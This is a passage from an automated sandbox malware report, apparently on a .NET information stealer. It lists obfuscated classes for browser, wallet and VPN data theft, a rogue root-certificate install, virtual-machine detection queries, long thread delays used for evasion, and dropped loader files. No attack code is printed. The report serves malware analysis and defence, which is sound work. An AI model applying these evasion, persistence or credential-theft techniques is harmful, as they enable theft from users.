Source: in.exe.9.dr, Entity5.cs	High entropy of concatenated method names: 'AoQNvT9gkGq49b9V3q4', 'O0Zde79RujDIPB821od', 'hEZ5mf91r2oc5ZAPeUE', 'ycyFo790aDKQM1Q6H8L', 'byTa009EcamPN9dodKZ', 'wWJkep9LRAHN4NSGkXH', 'N1pP8O9GAX2sX78iQwk'
Source: in.exe.9.dr, Arrays.cs	High entropy of concatenated method names: 'AreEqual', 'AreEqual', 'AreEqual', 'AreSame', 'ConstantTimeAreEqual', 'AreEqual', 'HaveSameContents', 'HaveSameContents', 'HaveSameContents', 'HaveSameContents'
Source: in.exe.9.dr, GdiHelper.cs	High entropy of concatenated method names: 'GetVirtualDisplaySize', 'GetImageBase', 'ConvertToBytes', 'wIOvq3BGfAQQqXTBbUp', 'vAjhnBBr7K8gLbrkZTp', 'xaZRw3BlngZ78y5EVoG', 'brAeWSBSQt8395R9VJB', 'eekfj3BEPUxlDVuXwUE', 'yVDpbnBL2o9JmKDuDcq', 'rARwxNBidHQ503XyZ1r'
Source: in.exe.9.dr, TaskResolver.cs	High entropy of concatenated method names: 'ReleaseUpdates', 'UVhKQxCnahGmHFEdwSR', 'EeXrODCTEwU8wffCYkF', 'kbbBkcC1XCsIfxY1WXf', 'xXGYKBC0ik9csHuNywP', 'zSHENZCgU91hNlPsy3e', 'sqO3ISCYJuunvuBFDPO', 'wMLqroCOSDE4SVBomXK', 'BtMttxCRu5y2lLh97vF'
Source: in.exe.9.dr, DownloadAndExecuteUpdate.cs	High entropy of concatenated method names: 'IsValidAction', 'Process', 'umfM6RVKeT7kfdHvKVi', 'WHHMcGVb2tr9voscSld', 'g773edVDjc8WIpasmI0', 'Hk0hycVck12w9OX8rYm', 'EJu6RNVx5KBqeDkItP4', 'P5L9wFVzXwc7OHHsHnu', 'IGYCydCyrDlddWN7ffA', 'O08YxgCqlMTGeagxuDL'
Source: in.exe.9.dr, DownloadUpdate.cs	High entropy of concatenated method names: 'IsValidAction', 'Process', 'g6H26UCCDFQ8dT01dQC', 'CO6IF5CBLKRKhbTUdqC', 'eH7ceJCe1Z2cxhwQ8OP', 'VphRnrC2qEjlEKlVOxA', 'xRfE2lC9Zqm79ntGs29', 'Kk6vYTC6smQJrFbJiZi', 'xxobNBCjWdkP2Evhmi7', 'beg4lkCQ5A4WWFmqS3Z'
Source: in.exe.9.dr, FileCopier.cs	High entropy of concatenated method names: 'FindPaths', 'ChromeGetName', 'ChromeGetRoamingName', 'ChromeGetLocalName', 'JobWWJ2uN6u0qlNjjAY', 'm32Vm92tMtw0nCjNGWS', 'W74sNV24UQHsyok8nK5', 'f9rjkQ2ANZL248wlZv0', 'CXg7Cg2M9qU3V31tlts', 'xUAZqd2sndRjWeElwGt'
Source: in.exe.9.dr, KeyParameter.cs	High entropy of concatenated method names: 'GetKey', 'kOZ46GN0jUNnFfTh97t', 'aVWlp7Ng8QM78XbP6f0', 'K0RcSENRv6a6GMc35qj', 'iM4vhiNT75nlO0EVyWB', 'A0j8obN1doEP5wLIxuJ', 'eMfa4cNEgiw2QFgL1LV', 'xgJSStNL7HaoFfuVCoG'
Source: in.exe.9.dr, Entity18.cs	High entropy of concatenated method names: 'Id1', 'TreeObject8', 'Id2', 'Id3', 'Id4', 'Id5', 'Id6', 'Id7', 'Id8', 'PPyBCqqM0kO7aQsRVjP'
Source: in.exe.9.dr, MemoryCollect.cs	High entropy of concatenated method names: 'Id1', 'Id2', 'Id3', 'Id4', 'nV2LcJfEddUnAMLVNta', 'G31G90fL6OVspraOVbA', 'KX6mmPfG6hBL4iT0kvG', 'HxuVaNfgwE1bfkxEb7b', 'PgYyqdfR87EwPfhrknm', 'm5jJHsfrMUOZsVlPauh'
Source: in.exe.9.dr, RosComNadzor.cs	High entropy of concatenated method names: 'Id2', 'Id3', 'UV579RXO7Rdpqrnjo7V', 'xS2AdMXnxGaD3Cd4d39', 'bR4dRnXTMj0Mvby8HLX', 'YpEhrqX1vlHYiFl1wgB', 'kxTkuNX0FrXxUEjal8v', 'SlhQaAXgPnRs0QicSHS', 'lyUwHXXRmbuV39PT4pW', 'ynpXu3XEiebanftlxyu'
Source: in.exe.9.dr, Resource1.cs	High entropy of concatenated method names: 'mBXCbR6CtT8O15SKDK4', 'D1HjCE6B6v5piSi1vZs', 'bcVFVY6XVxuUhatpUMY', 'zJEsc76VSXEpnbncllS', 'J8XWx96eRBwAehudMTw', 'rg0BEn62HnQc6IW5ywY', 'dgUetJ698K1bERHwLPr', 'UH7NDx66UJQdB0i37TS', 'SyK7yL6jDXQyvr9C2jY', 'ofyTi86QXKv9GQHFvQi'
Source: in.exe.9.dr, OpenVPN.cs	High entropy of concatenated method names: 'Id2', 'Id3', 'QZngY2XIjDyrAvn3vvp', 'ldVD9YXWquL1nOByJlV', 'uMBgbsXJp8CFTcPBQr4', 'U58PiMXPetLusgWu6WI', 'aGhmxYXodRLKfJxQ0UA'
Source: in.exe.9.dr, ConnectionProvider.cs	High entropy of concatenated method names: 'Id1', 'RequestConnection', 'Id3', 'Id4', 'Id5', 'Id6', 'Id7', 'Id8', 'Id9', 'Id10'
Source: in.exe.9.dr, CryptoHelper.cs	High entropy of concatenated method names: 'Read', 'DecryptBlob', 'CalcM5', 'GetHexString', 'zf6Vbhf56kCPrCaBGKV', 'BJctOCfdeOnyZUwTZUw', 'Qe6nk7fHL6bQuF67F9w', 'pDMsv1fIAeI5LgLP0I9', 'E0K8q9fWb3OTl8MsZGt', 'BRJvoHfJiWoAdYBkeQu'
Source: in.exe.9.dr, Program2.cs	High entropy of concatenated method names: 'WriteLine', 'tfOeKgFUphRMPGbYVHR', 'M1rNf1FFpdLNxRsvQxF', 'y2IdidFwk6mb0jl0b2E', 'h3XwAPFXIdwW0qOntkd', 'b6vRgAFVf7GvcfappQ8', 'ycf65jFCH6NMOeoMGYX', 'Vi8cD7FBw3kbJcwfhUt', 'ttg3ruFe8Q0EbCp8F4F', 'xHSwHLF2c3D0Kr9uW9X'
Source: in.exe.9.dr, StringExt.cs	High entropy of concatenated method names: 'ChangeType', 'StripQuotes', 'Run', 'CiRs0DCoeWMo2gJpGMf', 'DIbiGtC35NrGHaATcLg', 'pGhGy3CJwDhY2SNTjsI', 'HfJJbuCPbUAr571xA3P', 'SgfwSDCm0TpN5D0bolZ', 'VyaYQiCKvvQkJOjvVbX', 'TZ9sIlCbhPBeKD0VLlH'
Source: in.exe.9.dr, AllWallets.cs	High entropy of concatenated method names: 'Id2', 'Id3', 'zdnfMEXweiDdHO1jqrM', 'E3EDfdXXoD8Tw9Ob6iR', 'iBqgSgXVwghODKoX9MG', 'zrb0ZsXCCMy9sBqTu16', 'PPE6uUXBvBqA4fUtRCN', 'bJb3sXXUHBasLi5mcrU', 'GBJrXwXF01r2V8DRSKt', 'c1GgwjXe4IEdJvwI1mP'
Source: in.exe.9.dr, EwV3ECxYhIse1SOarW.cs	High entropy of concatenated method names: 'MBXvWU1F3hP6XNq0rkA', 'NW9UUy1wd9TCaRccFBw', 'BPTavEfPI8', 'au0CYU1BGY2DPwLwkDH', 'mM5ihe1eBIaSZ8auFPB', 'pRLGxD12Bx6xx8PmEto', 'RxYbT319N52nKWN9dJP', 'OPRxDU163sBLCmxKepd', 'IqlOou1jsgumLF329fw', 'PJvuON1Q9rDebIpFDcZ'
Source: in.exe.9.dr, Kp3eZNOyNqfl614RmD.cs	High entropy of concatenated method names: 'l5dizeUqZ0', 'ev6hyTNPTs', 'NY5wFA1M9ZEj0REWEBE', 'lUCGvK1s54bO38F8Gr8', 'UWF1Ri1ufgMUXTIaClZ', 'vIpqsD1tI7puyFNB2dQ', 'mbU9PU148JR0clJnJor'
Source: in.exe.9.dr, geUwbRLwd0WNm7K3QP.cs	High entropy of concatenated method names: 'N8ciDNtrkD', 'UJfDNHTmFZ2YPk9V7WW', 'jkvbVDTK9miyxW3WC50', 'cm1hhqTbL5xHO8T9Zj5', 'xZeWmSTDOMaifpNRdd6', 'Y4qOZFTcAJmrLPHA1le', 'kZc5OUToldwtdWWbhxH', 'tJFaqBT3JJJvKFahByx', 'epnHXdTxnLhwwsgC8yl', 'LDIKtBTzOINIe5yoVBC'
Source: in.exe.9.dr, OBqe2IUAeSpOmlOQ4O.cs	High entropy of concatenated method names: 'nOQdl4ODOg', 'tY3dXGtH5f', 'q9qdvQao7g', 'DpYddoq5nS', 'vUcduRRnlL', 'sqedUSL72O', 'MNddRugcTR', 'd6IBJRRp2Z', 'c8idQhNv3S', 'V1kdEyl02V'
Source: in.exe.9.dr, itVrv600AOcMBhsiIT.cs	High entropy of concatenated method names: 'xdJaHaLaiy', 'V2DaSkpaDo', 'ojWablkBNc', 'DyHamcAFke', 'ArCa6Di0WB', 'EJyataZqWW', 'T7haJgpFAl', 'kNGa25aRtf', 'lj7acrWjTB', 'PYIahvCHho'
Source: in.exe.9.dr, DefaultConstants.cs	High entropy of concatenated method names: 'C1MC12QztsQ32HPQOnL', 'lvBXuwZyrEsMLi75owM', 'q6I9q0ZqCGeKWIvUC0X', 'U0oRTyZfwgUSKj3CjDm', 'N5VjrGZNmoi2kDhW361', 'vqxLroZ8vhtNtCTl798', 'hJVDxOQcsITxFU03w4B', 'avbJw9QxjlVaGc51U4i'
Source: in.exe.9.dr, RECT.cs	High entropy of concatenated method names: 'Ceiling', 'FromLTRB', 'GetNumericListSeparator', 'Inflate', 'Inflate', 'Intersect', 'Offset', 'Parse', 'Round', 'Truncate'
Source: in.exe.9.dr, XRails_Container.cs	High entropy of concatenated method names: 'IsOverTitleBarIcon', 'OnSizeChanged', 'OnTextChanged', 'OnMouseDown', 'OnMouseDoubleClick', 'OnMouseMove', 'OnMouseUp', 'CreateHandle', 'OnPaint', 'jyQqJmZzTIoraKmhKB6'
Source: in.exe.9.dr, XRails_TextBox.cs	High entropy of concatenated method names: '_Click', '_Enter', '_Leave', '_KeyDown', '_KeyUp', '_KeyPress', 'WatermarkContainer_Click', 'WatermarkContainer_Paint', 'OnFontChanged', 'OnForeColorChanged'
Source: in.exe.9.dr, XRails_LinkLabel.cs	High entropy of concatenated method names: 'OnMouseDown', 'OnMouseMove', 'OnMouseLeave', 'OnInvalidated', 'cQV4Jq7meYAHaBMf9Ry', 'FI7OFd7K2L3yig8Nyfm', 'V0j8Jw7bZmYHXL5aKwP', 'qp6U287DtnN8ZpoMZla', 'YKP8QC7cMvJTVVGuWa8', 'zW4lAP7xEI32PXx0WSW'
Source: in.exe.9.dr, XRails_LogoBox.cs	High entropy of concatenated method names: 'OnPaint', 'EMvD9pp6NJZbCDTmUUO', 'USG90ypjxSS504sXcpn', 'Jq4sn1pQfYt12mXxtPd', 'IOlABhpZb3ZVR4ivZNc', 'Jx2PPFpkSKTkYvWvIrx', 'oo3Yt2p7R0sa4KNpkUe', 'bFilkNpp49BM8VIRyyW', 'ig6p1Tp2ueuk1TkS3MY', 'JdBU45p9tpl47k4Idxy'
Source: in.exe.9.dr, XRails_Label.cs	High entropy of concatenated method names: 'OnMouseDown', 'jgaB2R7goqSEAC8wkVZ', 'Q1749q7R3UxBYOrD2Km', 'efTsff7ENTFRKQbK1BH', 't3A7V57LFxooyRlCPr0', 'bXaMXh7G3rglNOagkNl', 'bcEGSt7r1k9GJfKEB3I', 'ODTRGQ716w3nvJ70jSW', 'nyXiYM700hAHi3N7v88', 'dZG8QR7lhMrV7hyT6cU'
Source: in.exe.9.dr, XRails_LeftPanel.cs	High entropy of concatenated method names: 'OnMouseDown', 'RUIJSV7MKDcYOndtn0B', 'u141kV7s6G77pyncm4N', 'qbGdKZ7u6E4Z7HlsRqY', 'dluxQU7tcNKSCRhSWLl', 'cIjoLB7485quTjRCcHP', 'NKmF7a7AE8Q8wmEiDPo', 'ILUeMZ75VvZ9P9RbkxF', 'mvXkU27deWa8gZqYcp6', 'rVPSib7HlqCJapUD1lC'
Source: in.exe.9.dr, XRails_RightPanel.cs	High entropy of concatenated method names: 'OnMouseDown', 'eowk7oprbN3raUvnQny', 'OEWUUOplocU7AfwedHw', 'EZBpSPpS9VGRxAmqND5', 'YFK10bpiShbk41h6wV4', 'kRC53NphFWBunYimtPB', 'pNaoqUpMkfqWviI0PJp', 'vwPy5lpLWlWd4cOQ9dD', 'mMt9itpGS1214lwx9sh', 'dDo9iHpsvgliF4D5UT8'
Source: in.exe.9.dr, XRails_ControlBox.cs	High entropy of concatenated method names: 'OnResize', 'OnMouseMove', 'OnMouseLeave', 'OnMouseDown', 'OnMouseUp', 'OnCreateControl', 'OnPaint', 'nMlvT2kP1J3fN94PV15', 'CdO9TCkoZrhHfXSfYtK', 'TwXXhQk3oODLYsQeuTX'
Source: in.exe.9.dr, XRails_TitleLabel.cs	High entropy of concatenated method names: 'OnMouseDown', 'OnPaint', 'U3ElydvH5FnBj9chqrn', 'QlaiGxvIysaV3VOXHgS', 'SrIMfcvWptHatp6m2s8', 'iXATwxvJjE8L9m6TY9C', 'XwVEFhvPVNlkSkvQTo6', 'YM7wB4volJ0XHDYdQ9J', 'IGadDMv3KExhDRwQDdC', 'RB5mptvmX4ZtU00DFO1'
Source: in.exe.9.dr, XRails_Button.cs	High entropy of concatenated method names: 'NotifyDefault', 'PerformClick', 'RoundedRect', 'OnMouseUp', 'OnMouseDown', 'OnMouseMove', 'OnMouseLeave', 'OnTextChanged', 'OnHandleCreated', 'OnResize'

Persistence and Installation Behavior

Installs new ROOT certificates

Source: C:\Users\user\AppData\Local\Temp\main\in.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 Blob

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exe	File created: C:\Users\user\AppData\Local\Temp\main\7z.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	File created: C:\Users\user\AppData\Local\Temp\main\extracted\in.exe	Jump to dropped file
Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exe	File created: C:\Users\user\AppData\Local\Temp\main\7z.exe	Jump to dropped file

Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\main\in.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\main\in.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Memory allocated: E50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Memory allocated: 28C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Memory allocated: 2650000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Window / User API: threadDelayed 1232			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Window / User API: threadDelayed 797			Jump to behavior

Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\main\7z.dll

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\main\7z.exe

API coverage: 5.1 %

Source: C:\Users\user\AppData\Local\Temp\main\in.exe TID: 5764	Thread sleep time: -5534023222112862s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe TID: 1020	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\main\in.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exe	Code function: 0_2_0040367D GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,	0_2_0040367D
Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exe	Code function: 0_2_004031DC FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,	0_2_004031DC
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	Code function: 5_2_00457978 FindFirstFileW,FindFirstFileW,free,	5_2_00457978

Source: C:\Users\user\AppData\Local\Temp\main\7z.exe

Code function: 5_2_0045881C free,free,GetLogicalDriveStringsW,GetLogicalDriveStringsW,free,free,free,

5_2_0045881C

Source: C:\Users\user\AppData\Local\Temp\main\7z.exe

Code function: 5_2_0045B5E0 GetSystemInfo,

5_2_0045B5E0

Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\main\extracted	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\main\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior

Source: in.exe, 0000000B.00000002.2145079467.0000000003D23000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: in.exe, 0000000B.00000002.2145079467.0000000003D23000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: in.exe, 0000000B.00000002.2145079467.0000000003D23000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: in.exe, 0000000B.00000002.2145079467.0000000003CB2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: in.exe, 0000000B.00000002.2145079467.0000000003CB2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: in.exe, 0000000B.00000002.2145079467.0000000003CB2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: in.exe, 0000000B.00000002.2145079467.0000000003CB2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: in.exe, 0000000B.00000002.2145079467.0000000003D23000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: in.exe, 0000000B.00000002.2145079467.0000000003D23000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: in.exe, 0000000B.00000002.2145079467.0000000003CB2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
